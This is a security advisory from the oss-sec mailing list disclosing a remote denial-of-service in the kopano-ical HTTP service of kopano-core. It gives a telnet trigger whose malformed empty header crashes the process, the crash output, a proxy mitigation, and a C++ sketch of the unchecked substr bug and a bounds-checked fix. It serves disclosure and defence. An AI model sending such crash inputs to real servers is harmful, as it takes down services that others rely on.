oss-sec mailing list archives

kopano-core 11.0.1.77: Remote DoS with out-of-bounds access


From: Jan Engelhardt <jengelh () inai de>
Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST)

Initial publication, no CVE number yet.

# Affected versions

  * kopano-core 11.0.1
  * kopano-core 8.7.20
  * it is believed this affects all other versions too,
    including 10.0.7, 9.1.0, and zarafa 7.2.6.

The "kopano-ical" program implements a network service/trivial HTTP 
server. It fails to properly check HTTP headers, and with a crafted 
request, can be exploited to drive the process into an exception and 
have it terminate.


# Trigger

» ./kopano-ical -F &
» telnet localhost 8000
Trying ::1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Foo:
Connection closed by foreign host.
terminate called after throwing an instance of 'std::out_of_range'
  what():  basic_string::substr: __pos (which is 6) > this->size() (which is 5)


# Mitigation

When kopano-ical sits behind a proxy, the issue does not occur, as 
proxies often filter lines (LF->CRLF, giving an extra byte). Tested ones: 
nginx-1.19.8, squid-4.14, apache2-2.4.46, tinyproxy-1.10.0
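
Added example (not part of the original post, and not kopano-ical's code): the kind of defect the `what()` text in the trigger output points to, an unchecked `std::string::substr` offset on a header line, next to a bounds-checked parser. The function names and the offset of two bytes past the colon are assumptions, since the page does not show the parsing code, so the numbers differ from the trace; it also shows why a single extra byte on the line avoids the exception.

```cpp
#include <cstddef>
#include <stdexcept>
#include <string>
#include <utility>

using Header = std::pair<std::string, std::string>;

// Fragile pattern (hypothetical): assumes every header line looks like
// "name: value", i.e. that at least two bytes follow the colon.
// std::string::substr throws std::out_of_range when pos > size().
Header parse_header_naive(const std::string &line)
{
    std::size_t colon = line.find(':');
    return {line.substr(0, colon), line.substr(colon + 2)};
}

// Hardened form: validate the shape first, never index past the end,
// and report a malformed line to the caller instead of throwing.
bool parse_header_checked(const std::string &line, Header &out)
{
    std::size_t colon = line.find(':');
    if (colon == std::string::npos || colon == 0)
        return false;                       // no separator, or empty name
    out.first = line.substr(0, colon);
    out.second.clear();
    // Skip optional whitespace after the colon; an empty value is legal.
    std::size_t start = line.find_first_not_of(" \t\r\n", colon + 1);
    if (start == std::string::npos)
        return true;
    // start exists, so the last non-whitespace byte is at or after it.
    std::size_t end = line.find_last_not_of(" \t\r\n");
    out.second = line.substr(start, end - start + 1);
    return true;
}

// True when the naive parser lets std::out_of_range escape for this line.
// Uncaught in a server process, that exception ends in std::terminate.
bool naive_throws(const std::string &line)
{
    try {
        parse_header_naive(line);
        return false;
    } catch (const std::out_of_range &) {
        return true;
    }
}
```

With the constructed input `"Foo:"` the naive parser throws, while `"Foo: "` (one byte longer) does not, because `substr` accepts `pos == size()`.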

